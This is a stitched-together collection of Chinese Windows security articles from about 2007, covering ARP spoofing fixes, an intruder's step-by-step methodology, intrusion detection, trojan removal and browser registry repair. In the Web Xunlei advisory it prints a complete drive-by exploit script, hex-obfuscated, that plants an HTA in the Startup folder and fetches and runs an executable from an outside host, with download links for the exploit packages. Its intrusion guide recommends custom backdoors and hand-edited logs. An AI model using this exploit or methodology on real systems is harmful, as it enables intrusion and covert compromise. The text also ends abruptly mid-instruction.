2)在Windows开始à运行à打开，输入cmd(windows98输入“command”)，在出现的DOS窗口中输入:C:\nbtscan -r 192.168.16.1/24(这里需要根据用户实际网段输入)，回车。

3)通过查询IP--MAC对应表，查出“000d870d585f”的病毒主机的IP地址为“192.168.16.223”。

【解决办法】

采用双向绑定的方法解决并且防止ARP欺骗。

1、在PC上绑定安全网关的IP和MAC地址：

1）首先，获得安全网关的内网的MAC地址（例如HiPER网关地址192.168.16.254的MAC地址为0022aa0022aa）。

2）编写一个批处理文件rarp.bat内容如下：

@echo off

arp -d

arp -s 192.168.16.254 00-22-aa-00-22-aa

将文件中的网关IP地址和MAC地址更改为实际使用的网关IP地址和MAC地址即可。

将这个批处理软件拖到“windowsà开始à程序à启动”中。

3）如果是网吧，可以利用收费软件服务端程序（pubwin或者万象都可以）发送批处理文件rarp.bat到所有客户机的启动目录。Windows2000的默认启动目录为“C:\Documents and Settings\All Users「开始」菜单程序启动”。

2、在安全网关上绑定用户主机的IP和MAC地址：

在WebUIà高级配置à用户管理中将局域网每台主机均作绑定。

网络入侵一般步骤及思路

防黑必要知黑，黑客横行的年代，身为一名网络工作者就必须对黑客知识有一定的了解。如何保证网络安全，如何防止黑客入侵呢？编者讲给大家带来网络入侵的步骤，进行详细说明。

网络入侵一般步骤及思路

第一步：进入系统

1. 扫描目标主机。

2. 检查开放的端口，获得服务软件及版本。

3. 检查服务软件是否存在漏洞，如果是，利用该漏洞远程进入系统；否则进入下一步。

4. 检查服务软件的附属程序(*1)是否存在漏洞，如果是，利用该漏洞远程进入系统；否则进入下一步。

5. 检查服务软件是否存在脆弱帐号或密码，如果是，利用该帐号或密码系统；否则进入下一步。6. 利用服务软件是否可以获取有效帐号或密码，如果是，利用该帐号或密码进入系统；否则进入下一步。

7. 服务软件是否泄露系统敏感信息，如果是，检查能否利用；否则进入下一步。

8. 扫描相同子网主机，重复以上步骤，直到进入目标主机或放弃。

第二步：提升权限

1. 检查目标主机上的SUID和GUID程序是否存在漏洞，如果是，利用该漏洞提升权限，否则进入下一步。

2. 检查本地服务是否存在漏洞，如果是，利用该漏洞提升权限，否则进入下一步。

3. 检查本地服务是否存在脆弱帐号或密码，如果是，利用该帐号或密码提升权限；否则进入下一步。

4. 检查重要文件的权限是否设置错误，如果是，利用该漏洞提升权限，否则进入下一步。

5. 检查配置目录(*2)中是否存在敏感信息可以利用。

6. 检查用户目录中是否存在敏感信息可以利用。

7. 检查临时文件目录(*3)是否存在漏洞可以利用。

8. 检查其它目录(*4)是否存在可以利用的敏感信息。

9. 重复以上步骤，直到获得root权限或放弃。

第三步：放置后门

最好自己写后门程序，用别人的程序总是相对容易被发现。

第四步：清理日志

最好手工修改日志，不要全部删除，也不好使用别人写的工具。

附加说明：

*1 例如WWW服务的附属程序就包括CGI程序等

*2 这里指存在配置文件的目录，如/etc等

*3 如/tmp等，这里的漏洞主要指条件竞等

*4 如WWW目录，数据文件目录等

/************************************************************************/

好了，大家都知道了入侵者入侵一般步骤及思路 那么我们开始做入侵检测了。

第一步、我们都知道一个入侵者想要入侵一台服务器首先要扫描这台服务器，搜集服务器的信息，以便进一步入侵该系统。系统信息被搜集的越多，此系统就越容易被入侵者入侵。 所以我们做入侵检测时，也有必要用扫描器扫描一下系统，搜集一下系统的一些信息，来看看有没有特别流行的漏洞(呵呵这个年头都时兴流行哦：)

第二步、扫描完服务器以后，查看扫描的信息－－－－>分析扫描信息。如果有重大漏洞－－－－>修补(亡羊补牢，时未晚)，如果没有转下一步。

第三步、没有漏洞，使用杀毒工具扫描系统文件，看看有没有留下什么后门程序，如：nc.exe、srv.exe......如果没有转下一步。

第四步、入侵者一般入侵一台机器后留下后门，充分利用这台机器来做一些他想做的事情，如：利用肉鸡扫描内网，进一步扩大战果，利用肉鸡作跳板入侵别的网段的机器，嫁祸于这台机器的管理员，跑流影破邮箱......

如何检测这台机器有没有装一些入侵者的工具或后门呢？

查看端口(偏好命令行程序，舒服)

1、fport.exe－－－>查看那些端口都是那些程序在使用。有没有非法的程序，和端口 winshell.exe 8110 晕倒～后门 net use 谁在用这个连接我？

2、netstat -an ---->查看那些端口与外部的ip相连。 23 x.x.x.x 没有开23端口，怎么自己打开了？？黑客！？

3、letmain.exe \\ip -admin -d 列出本机的administrators组的用户名查看是否有异常。 怎么多了一个hacker用户？？<＝＝>net user id

4、pslist.exe---->列出进程<==>任务管理器

5、pskill.exe---->杀掉某个进程，有时候在任务管理器中无法中止程序那就用这个工具来停止进程吧。

6、login.exe ---->列出当前都有那些用户登录在你的机器上，不要你在检测的同时，入侵者就在破坏：(

7、查看日志文件--->庞大的日志文件--->需要借助第三方软件来分析日志 记录了入侵者扫描的信息和合法用户的正确请求

Find “scirpts/..” C:\WINNT\system32\LogFiles\W3SVC1\ex010705.log --解码漏洞？？谁在扫描我？

8、查看 Web 目录下文件改动与否 留没有留 asp php 后门......查看存放日志文件的目录

DOS dir /a

GUI 查看显示所有文件和文件夹

技巧：查看文件的修改日期，我两个月没有更新站点了(好懒：)，怎么 Web 目录下有最近修改文件的日期？？奇怪吧？：)

＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃

C:\WINNT\system32\LogFiles\W3SVC1>dir

驱动器 C 中的卷是 system Server

卷的序列号是 F4EE-CE39

C:\WINNT\system32\LogFiles\W3SVC1 的目录

2001-07-05 02:43 1,339 ex010704.log

2001-07-05 23:54 52,208 ex010705.log

2001-07-07 22:59 0 ex010707.log

2001-07-08 22:45 0 ex010708.log

2001-07-10 08:00 587 ex010709.log

恩？奇怪？怎么没有 2001-07-06 那天的日志文件？？可疑......2001-07-07、2001-07-08 两天的日志文件大小为零，我得网站访问量怎么两天都是空？？没有那么惨吧：(好奇怪？！

＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃

D:\win 2000>dir \s

驱动器 D 中的卷是 新加卷

卷的序列号是 28F8-B814

D:\win 2000 的目录

2001-06-03 17:43

.

2001-06-03 17:43

.. 

2001-06-03 17:43

CLIENTS

2001-06-03 17:43

BOOTDISK

2001-06-03 17:46

PRINTERS

2001-06-03 17:46

SETUPTXT

2001-06-03 17:46

SUPPORT

2001-06-03 17:46

VALUEADD

2000-01-10 20:00 45 AUTORUN.INF

2000-01-10 20:00 304,624 BOOTFONT.BIN

2000-01-10 20:00 5 CDROM_IS.5

2000-01-10 20:00 5 CDROM_NT.5

2000-01-10 20:00 12,354 READ1ST.TXT

2000-01-10 20:00 465,408 README.DOC

2000-01-10 20:00 267,536 SETUP.EXE

2001-06-04 17:37

SP1 

2001-06-27 16:03

sp2

有修改或安装什么文件程序啊 什么时候多了system目录？这个是我安装 win 2000 的安装文件。 日期怎么不对 2001-07-06，日志文件也没有 2001-07-06 的这一天的记录，可疑.......

7 个文件 1,049,977 字节

12 个目录 10,933,551,104 可用字节

＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃＃ 

总的来说入侵检测包括：

一、基于80端口入侵的检测 CGI IIS 程序漏洞......

二、基于安全日志的检测 工作量庞大

三、文件访问日志与关键文件保护

四、进程监控 后门什么的

五、注册表校验 木马

六、端口监控 21 23 3389 ...

七、用户 我觉得这个很重要，因为入侵者进入系统以后，为了方便以后的“工作”通常会加一个用户或者激活guest帐号提升为管理员的

/************** 借助第三方软件协助分析 IDS Firewall .....***********************/

对 unix & linux 入侵检测说几句

有必要先用扫描器扫描一下系统，搜集一下资料 CGI RPC TELNETD FTP ......本地远程溢出漏洞...... 

1、检查 suid sgid 程序

find / -user root -perm -4000 -print --常用

find / -group kmem -perm -2000 -print

2、查看系统的二进制文件是否被更改

如：ls su telnet netstat ifconfig find du df sync login......

建议做入侵检测时候，从一个干净的系统 copy 过来这些文件 来做检测

使用 MD5 Tripwire 校验工具检测

3、检查 /etc/passwd 文件

有没有新增的用户、没有口令的帐号、uid等于0的帐号......

4、检查有没有网络监听程序在运行

netstat -an

5、检查系统非正常的隐藏文件

".." ".. " "..^G"

find / -name ".. " -print -xdev

find / -name ".*" -print -xdev 　 cat -v

6、在系统正常运作的情况下，系统管理员要经常使用下列命令(必要的话，系统管理员可以改变 path，或者修改二进制文件名称，放到一个只有自己知道的目录下)在保证二进制文件没有被篡改的情况下用绝对路径

/bin/who

/bin/w

/bin/last

/bin/lastcom

/bin/netstat

/bin/snmpnetstat

.

.

.

shell 的历史文件 如：.history 、.rchist、.bash_history......

7、日志

8、........

因为 unix&vlinux系列源代码是开放的，所以如果入侵者装上了内核后门 #!@$%!#@%$#@^&

强烈建议备份您机器上重要文件，重装系统，打好补丁，迎接入侵者^_^

/******************借助第三方软件协助分析 IDS Firewall .....**********************/

入侵检测介绍就到这里，在实际运用中，系统管理员对基础知识掌握的情况直接关系到他的安全敏感度，只有身经百战而又知识丰富、仔细小心的系统管理员才能从一点点的蛛丝马迹中发现入侵者的影子，未雨绸缪，扼杀入侵的行动。 --shutgon的话：）

黑客关注 Web迅雷 0day漏洞 发起新攻击

黑客关注 Web迅雷 0day漏洞 发起新攻击

来源：赛迪网 作者：李铁军

除操作系统外，用户群越广的软件，被攻击的可能性越大。最近不少恶意软件攻击者把目录投向迅雷，有关Web迅雷的0day在黑客圈广为流行，迅雷官方补丁，升级程充也发了若干个版本以修补这些安全隐患，但似乎效果不佳。

昨天下班，一兄弟的电脑上，毒霸发现一堆盗号木马，和毒霸论坛上反馈的情况类似。使用Sreng分析，发现一堆DLL文件插入正常程序的进程，hosts中禁止了一大堆安全软件的网站，各磁盘分区被写入autorun.inf和另一个随机8位字符的EXE。用毒霸清理专家的文件粉碎器和Sreng的日志分析，把这些SYS、DLL文件全部干掉，才没有继续下载onlinegame木马。

风险分析：这位兄弟的电脑涉及公司很多机密信息，平常非常注重安全管理，系统补丁，管理员口令，甚至权限都很严密，自动播放也被禁止。配置了毒霸自动杀毒和更新，发现病毒是极为罕见的事情，也会被认为是重大安全事件。风险来自哪里呢？

仔细分析后，发现与打开Web迅雷有关，这是已经升级到最新的Web迅雷版本。尝试重新打开Web迅雷，很快毒霸又报告发现木马。尽管，我尚无法分析出是有关Web迅雷的具体漏洞。已经感觉到这些病毒，是和Web迅雷的下载行为是相关的。

在分析最近发现的那些插入正常程序进程的DLL病毒时，我明显感觉到病毒的版本更新速度超过了杀毒病毒库的更新速度，病毒程序的在线升级速度，也快过杀毒软件的升级速度。（写到这儿，又会有粪青耻笑了——谁让你用毒霸），我要说的是，每次，我从论坛或客户那边拿到的这些样本，都会用各种杀毒软件检查一遍，目前，我没有发现任何一个产品能检查到全部样本。

在病毒作者的圈子中，交换程序代码相当普遍，怀疑他们用来对付杀毒软件的代码，也是共享的。而杀毒厂商之间，显然，还没有实现这一点。这就要我们更加关注服务，关注应急响应。我很高兴地看到毒霸在这方面进展迅速，珠海兄弟们很辛苦，谢谢他们！

Web迅雷0day漏洞被曝光

DSW Lab AVERT小组监测到一个高度危险讯雷漏洞被曝光，该漏洞发生在Web迅雷的一个控件上，当安装了Web迅雷的用户在浏览黑客精心构造的包含恶意代码的网页后，会下载任意程序在用户系统上以当前用户上下文权限运行。

Web迅雷1.7.3.109版之前的版本均受影响。

一、事件分析：

根据BCT组织分析，该漏洞产生细节如下：

WEB讯雷组件的名称：ThunderServer.webThunder.1，可以采用JS代码ActiveXObject("ThunderServer.webThunder.1");来激活讯雷的组件。其中的关键函数包括：

SetBrowserWindowData：新建浏览器窗口。

SetConfig：设置WEB讯雷。

HideBrowserWindow：隐藏浏览器。

AddTask：添加下载任务。

SearchTask：搜索任务，得到任务ID，文件下载状态等详情。

OpenFile：根据任务ID，打开文件。

攻击者利用这一系列的函数，已经能完成从下载到运行木马程序的完整过程，实现了一个完整的网页木马功能。

二、解决方案：

1、SetBrowserWindowData 函数验证URL参数是否为本地地址，或者为讯雷官方的地址，避免用户浏览除了本地到官方的URL地址，从而一定程度上防御外来恶意数据。

2、在漏洞曝光后，迅雷官方反应迅速，第一时间推出升级版，请将Web迅雷升级到最新版。

版本号：1.7.3.109

点击下载web迅雷 V1.7.2.107

3、推荐安装超级巡警防范恶意木马。

注：

该漏洞由 Bug.Center.Team 组织发现并公布。

漏洞发现者：Sobiny[BCT]

关于Web迅雷：

Web迅雷是迅雷公司最新推出的一款基于多资源超线程技术的下载工具，和迅雷5作为专业下载工具的定位不同， web迅雷在设计上更多的考虑了初级用户的使用需求，使用了全网页化的操作界面，更符合互联网用户的操作习惯，带给用户全新的互联网下载体验！

WEB迅雷存在漏洞,可构造成网页木马!
--------------------------------------------------------------//＞Rootkit.Js
var Good_fan = null;
function shit()
{
try{Good_fan = new ActiveXObject("\x54\x68\x75\x6E\x64\x65\x72\x53\x65\x72\x76\x65\x72\x2E\x77\x65\x62\x54\x68\x75\x6E\x64\x65\x72\x2E\x31");}
catch(e){return;}
var vip;
vip="＜script defer＞ var shell=\"＜html＞＜body＞＜script＞window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject(\\\"wscript.shell\\\");shell.Run(\\\"C:\\\\\\\\Progra~1\\\\\\\\Intern~1\\\\\\\\IEXPLORE.EXE http://www.rootkit.com.cn/vips.htm\\\",0,0);function runmm(){var path=shell.SpecialFolders(\\\"MyDocuments\\\");var china=path.substring(0,path.lastIndexOf(\\\"\\\\\\\\\\\"));china+=\\\"\\\\\\\\Local Settings\\\\\\\\Temporary Internet Files\\\\\\\\Content.IE5\\\\\\\\\\\";var sp=new ActiveXObject(\\\"shell.application\\\");var chenzi=sp.NameSpace(china);for(i=0;i＜chenzi.Items().Count;i++){var Folder=chenzi.Items().Item(i).path;Folder+=\\\"\\\\\\\\vip[1].exe\\\";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run(\\\"cmd.exe /c tree c:\\\\\\\\ /f\\\",0,1);runmm();＜\\/script＞＜/body＞＜/html＞\";var love = new ActiveXObject(\"ADODB.Recordset\");love.Fields.Append(\"love\", 200, 3000);love.Open();love.AddNew();love.Fields(\"love\").Value=shell;love.Update();love.Save(\"C:\\\\Documents and Settings\\\\All Users\\\\「开始」菜单\\\\程序\\\\启动\\\\microsofts.hta\",0);love.Close();＜/script＞";
var ret=Good_fan.AddCateogry(vip);
Good_fan.SetBrowserWindowSize(0,0,400,300);
var strps = Good_fan.GetServerPath();
strps = strps.substr(0, strps.length-1);
strps+="\\page\\index.htm";
Good_fan.SetBrowserWindowData(strps,"love");
Good_fan.HideBrowserWindow(1);
return;
}

-------------------------------------------------------//Rootkit.js 结束

----------------------------Rootkit.htm-------------------------------
＜SCRIPT src="rootkit.js"＞＜/SCRIPT＞
＜BODY onload=shit();＞＜BR＞＜BR＞
--------------------------Rootkit.Htm 结束--------------------------

----------------------Rootkits.htm-----------------------------------
＜script src="rootkit.exe"＞＜/script＞
---------------------rootkits.htm--------------------------------------

完整打包下载: 点击下载此文件

http://www.rootkit.com.cn/attach ... 6/a200762693015.rar
http://www.expl0its.cn/attachments/month_0706/l20076521230.rar
http://www.zyxunmeng.cn/attachments/month_0706/i200762694136.rar

病毒清除技巧u.vbe和u.bat手动清除方法

病毒清除技巧u.vbe和u.bat手动清除方法

来源：赛迪网病毒求助专区 作者：lvvl

发现u盘带来了“u.vbe”的病毒将每个盘都感染了。而且电脑里的各个盘都打不开，打开直显示什么“u.vbe”。

虽然这个病毒对操作系统没有太大的影响，但这些文件很碍眼，直接删除并不彻底，下次开机仍会出现，并且造成在我的电脑打开每个盘符时会另起一个窗口打开。

根据相关书籍，成功破解了u.vbe，并利用一小段代码成功消除了u.vbe这个病毒。

现将解决方法附下：

在电脑屏幕的左下角按“开始→程序→附件→记事本”，把下面的文字复制进去，点“另存为”，路径选“桌面”，保存类型为“所有文件”，文件名为“u.vbe病毒消除.bat”，就完成了。记住后缀名一定要是.bat。

双击它就能很快地消除这个病毒。

======就是下面的文字(这行不用复制)=============================

@echo on

taskkill /im explorer.exe /f

taskkill /im wscript.exe

start reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\EXplorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f

start reg import kill.reg

del c:\autorun.* /f /q /as

del %SYSTEMROOT%\system32\autorun.* /f /q /as

del d:\autorun.* /f /q /as

del e:\autorun.* /f /q /as

del f:\autorun.* /f /q /as

del g:\autorun.* /f /q /as

del h:\autorun.* /f /q /as

del i:\autorun.* /f /q /as

del j:\autorun.* /f /q /as

del k:\autorun.* /f /q /as

del l:\autorun.* /f /q /as

start explorer.exe

=====到这里为止(这行不用复制)==================================

以后只要双击运行该文件，等它运行结束后，再重启电脑即可完全消除这个病毒。

病毒清除技巧 ati2evxx.exe 的清除方法

木马伪装成ATi显卡服务，有点可恶！生成文件，如果系统在C盘就是：

C:\Program Files\Common Files\ati2evxx.exe

C:\Program Files\Common Files\ATi\ati2evxx.exe，并创建注册表服务项。

清除方法

1.右击任务栏打开任务管理器，结束ati2evxx.exe进程；

（注：如果你的显卡是ATi的，用户名是SYSTEM的ati2evxx.exe进程是正常的，而你登入的用户名或是Administrator的ati2evxx.exe进程才是木马进程）

2. 删除病毒文件：

C:\Program Files\Common Files\ati2evxx.exe

C:\Program Files\Common Files\ATi\ati2evxx.exe

3. 删除注册表服务项：

运行regedit打开注册表，用寻找ati2evxx.exe的方法来删除，如果你的显卡是ATi的注意路径是：

C:\Program Files\Common Files\ati2evxx.exe

C:\Program Files\Common Files\ATi\ati2evxx.exe

不要把正常的给删除了，不过要是删错的话，清完毒后，重装一下ATi的显卡驱动也可以。

Infostealer.Gampass病毒的手动删除方法

前段时间有个同事说他的诺顿不停的出现高危警报对话框，关闭了又弹出，反复如此，严重影响了他的工作，请我帮忙检查一下是不是中了病毒。

我看了警报上提示的内容，是一个名为Infostealer.Gampass的病毒。从名字上看，应该是个盗取游戏密码的病毒，从现象上看，好像对系统中的文件并没有什么影响，系统运行也不慢，只是诺顿不断弹出警报对话框确实是个问题，于是更新了病毒库，在文件选项中选择显示所有文件，再重新启动到安全模式下全盘扫描。并告诉同事完成后重启电脑就OK。 Infostealer.Gampass病毒的删除方法

本以为是个小病毒，诺顿杀杀应该就没问题了。结果一会同事打来电话说诺顿又开始弹出警报，还是那个病毒。看样子是在注册表中隐藏了什么自启动的东东，说不定就是这个病毒的主体文件，诺顿不行，只有手动来清除了。

首先检查各分区根目录，没有发现autorun.inf的目录或可疑的可执行文件。c:\windows和c:\windows\system32两个系统目录，也是重点，发现下面有很多"数字.exe"或"数字+字母.exe"的文件以及同名的.dll文件，估计是病毒自动生成的，但这些绝对不是主体病毒文件，所以估计删除了也没太大作用，还是先删了再说。

病毒应该隐藏得更深一些。

接着开始检查注册表，检查

HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN

HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN

四个键值下面的可疑程序，在后面两个键下面，果然发现如下的项有问题：

C:\windows\system32\winbill*.dll, c:\program files\internet explorer\use19.dll

其中的*代表数字。

删除和上面两个文件有关的键，此时不能删除这两个文件。重启电脑进入安全模式，删除以上两个文件（在c:\program files\internet explorer\下还发现一个use32.dll的文件，同样删掉。），这就是病毒的主体文件。再次全盘扫描，清除系统目录下的病毒尸体。重新启动，诺顿再也没有弹出警报。

分析了一下，这个病毒实际是个间谍软件，对系统没有太大影响和破坏力。诺顿可以查出这个病毒，也可以抑制，但由于病毒在系统启动时就加载了，所以诺顿无法彻底清除，故只能采用手动与自动相结合的办法来杀毒了。

Kvsc3.exe、Kvsc3.dll病毒查杀清除方法

病毒名称：Trojan-PSW.Win32.OnLineGames.zl（Kaspersky）

病毒别名：Trojan.PSW.Win32.OnlineGames.cql（瑞星）, Trojan.PSW.Win32.SunOnline.f [dll]（瑞星）Win32.Troj.PSWGameT.lk.17408（毒霸）, Win32.Troj.PSWGameT.xk.17408 [dll]（毒霸）

病毒大小：22,528 字节

加壳方式：

样本MD5：7f14320161a8e7530c719965a6b8adbd

样本SHA1：a4d7132acbdedee2e7765a6d7c34e1559c8cc1ca

发现时间：2007.6

更新时间：2007.6.27

关联病毒：

传播方式：恶意网页、其它病毒下载

技术分析

木马运行后复制自身到系统目录：

%Windows%\Kvsc3.exe

释放dll注入进程：

%System%\Kvsc3.dll

（注：如果Kvsc3.dll已经存在，木马释放的dll会以随机字母作为文件名，比如olnryh.dll、ojprzc.dll）

木马创建的启动项：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Kvsc3"="%Windows%\Kvsc3.exe"

清除步骤

1. 删除木马启动项：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Kvsc3"="%Windows%\Kvsc3.exe"

2. 重新启动计算机

3. 删除木马文件：

%Windows%\Kvsc3.exe

%System%\Kvsc3.dll

网页被改不再怕 找到出问题的注册表根源

来源：赛迪网安全社区 作者：lvvl

近来，屡屡发生网友在浏览网页时，造成注册表被修改，使得IE默认连接首页、标题栏及IE右键菜单被改为浏览网页时的地址（多为广告信息），更有甚者使浏览者的电脑在启动时出现一个提示窗口显示自己的广告，而且有愈演愈烈之势，遇到这种情况我们该怎样办呢？

一、注册表被修改的原因及解决办法

其实，该恶意网页是含有有害代码的ActiveX网页文件，这些广告信息的出现是因为浏览者的注册表被恶意更改的结果。

1、IE默认连接首页被修改

IE浏览器上方的标题栏被改成“欢迎访问……网站”的样式，这是最常见的篡改手段，受害者众多。

受到更改的注册表项目为：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

通过修改“Start Page”的键值，来达到修改浏览者IE默认连接首页的目的，如浏览“万花谷”就会将你的IE默认连接首页修改为“hxxp://on888.home.chinaren.com”，即便是出于给自己的主页做广告的目的，也显得太霸道了一些，这也是这类网页惹人厌恶的原因。

解决办法：

①在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；

②展开注册表到

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

下，在右半部分窗口中找到串值“Start Page”双击 ，将Start Page的键值改为“about:blank”即可；

③同理，展开注册表到

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

在右半部分窗口中找到串值“Start Page”，然后按②中所述方法处理。

④退出注册表编辑器，重新启动计算机，一切OK了！

特殊例子：当IE的起始页变成了某些网址后，就算你通过选项设置修改好了，重启以后又会变成他们的网址啦，十分的难缠。其实他们是在你机器里加了一个自运行程序，它会在系统启动时将你的IE起始页设成他们的网站。

解决办法：运行注册表编辑器regedit.exe，然后依次展开

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run

主键，然后将其下的registry.exe子键删除，然后删除自运行程序c:\Program Files\registry.exe，最后从IE选项中重新设置起始页就好了。

2、篡改IE的默认页

有些IE被改了起始页后，即使设置了“使用默认页”仍然无效，这是因为IE起始页的默认页也被篡改啦。具体说来就是以下注册表项被修改：

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL

“Default_Page_URL”这个子键的键值即起始页的默认页。

解决办法：

运行注册表编辑器，然后展开上述子键，将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了，或者设置为IE的默认值。

3、修改IE浏览器缺省主页，并且锁定设置项，禁止用户更改回来

主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选)：

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]

"Settings"=dword:1

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]

"Links"=dword:1

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]

"SecAddSites"=dword:1

解决办法：

将上面这些DWORD值改为“0”即可恢复功能。

4、IE的默认首页灰色按扭不可选

这是由于注册表

HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel

下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”，被修改为“1”（即为灰色不可选状态）。

解决办法：

将“homepage”的键值改为“0”即可。

5、IE标题栏被修改

在系统默认状态下，是由应用程序本身来提供标题栏的信息，但也允许用户自行在上述注册表项目中填加信息，而一些恶意的网站正是利用了这一点来得逞的：它们将串值Window

Title下的键值改为其网站名或更多的广告信息，从而达到改变浏览者IE标题栏的目的。

具体说来受到更改的注册表项目为：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

解决办法：

①在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；

②展开注册表到

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

下，在右半部分窗口中找到串值“Window Title” ，将该串值删除即可，或将Window Title的键值改为“IE浏览器”等你喜欢的名字；

③同理，展开注册表到

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

然后按②中所述方法处理。

④退出注册表编辑器，重新启动计算机，运行IE，你会发现困扰你的问题解决了！

6、IE右键菜单被修改

受到修改的注册表项目为：

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

下被新建了网页的广告信息，并由此在IE右键菜单中出现！

解决办法：

打开注册标编辑器，找到

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

删除相关的广告条文即可，注意不要把下载软件FlashGet和Netants也删除掉啊，这两个可是“正常”的呀，除非你不想在IE的右键菜单中见到它们。

7、IE默认搜索引擎被修改

在IE浏览器的工具栏中有一个搜索引擎的工具按钮，可以实现网络搜索，被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改：

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant

解决办法：

运行注册表编辑器，依次展开上述子键，将“CustomizeSearch”和“SearchAssistant”的键值改为某个搜索引擎的网址即可。

8、系统启动时弹出对话框

受到更改的注册表项目为：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”，其中“LegalNoticeCaption”是提示框的标题，“LegalNoticeText”是提示框的文本内容。由于它们的存在，就使得我们每次登陆到Windwos桌面前都出现一个提示窗口，显示那些网页的广告信息！你瞧，多讨厌啊！

解决办法：

打开注册表编辑器，找到

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

这一个主键，然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串，删除这两个字符串就可以解决在登陆时出现提示框的现象了。

9、浏览网页注册表被禁用

这是由于注册表

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

下的DWORD值“DisableRegistryTools”被修改为“1”的缘故，将其键值恢复为“0”即可恢复注册表的使用。

解决办法

用记事本程序建立以REG为后缀名的文件，将下面这些内容复制在其中就可以了：

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

“DisableRegistryTools”=dword:00000000

10、浏览网页开始菜单被修改

这是最“狠”的一种，让浏览者有生不如死的感觉。浏览后不仅有类似上面所说的那些症状，还会有以下更悲惨的遭遇：

1)禁止“关闭系统”

2)禁止“运行”

3)禁止“注销”

4)隐藏C盘——你的C盘找不到了！

5)禁止使用注册表编辑器regedit

6)禁止使用DOS程序

7)使系统无法进入“实模式”

8)禁止运行任何程序

以上是比较常见的修改浏览者注册表的现象，今天在浏览网页时，无意中来到某个个人网站，又遇到了以前没有碰到过的问题：

11、IE中鼠标右键失效

浏览网页后在IE中鼠标右键失效，点击右键没有任何反应！

12、查看““源文件”菜单被禁用

在IE窗口中点击“查看”→“源文件”，发现“源文件”菜单已经被禁用。

我在浏览网页时并没有注意到上面这两个问题，因为当时正好朋友叫我有事，于是我就退出电脑了，晚上吃完饭开启电脑连线上网，就发现IE中鼠标右键失效，“查看”菜单中的“源文件”被禁用。不能查看源文件也就罢了，但是无法使用鼠标右键真是太不方便了。得想个办法！

找出最新版的超级兔子魔法设置试试吧，呀！不能解决！看来是个新问题，不过自己好歹也是“老革命”了，这点问题应该难不住我。于是到注册表中一番搜寻，经过一番查找终于弄明白了问题的所在。

原来，恶意网页修改了我的注册表，具体的位置为：

在注册表

HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer

下建立子键“Restrictions”，然后在“Restrictions”下面建立两个DWORD值：“NoViewSource”和“NoBrowserContextMenu”，并为这两个DWORD值赋值为“1”。

在注册表

HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions

下，将两个DWORD值：“NoViewSource”和“NoBrowserContextMenu”的键值都改为了“1”。

通过上面这些键值的修改就达到了在IE中使鼠标右键失效，使“查看”菜单中的“源文件”被禁用的目的。要向你说明的是第2点中提到的注册表其实相当于第1点中提到的注册表的分支，修改第1点中所说的注册表键值，第2点中注册表键值随之改变。

解决办法：

明白了道理，问题解决起来就容易多了，具体解决办法为：将以下内容另存为后缀名为reg的注册表文件，比方说unlock.reg，双击unlock.reg导入注册表，不用重启电脑，重新运行IE就会发现IE的功能恢复正常了。

REGEDIT4

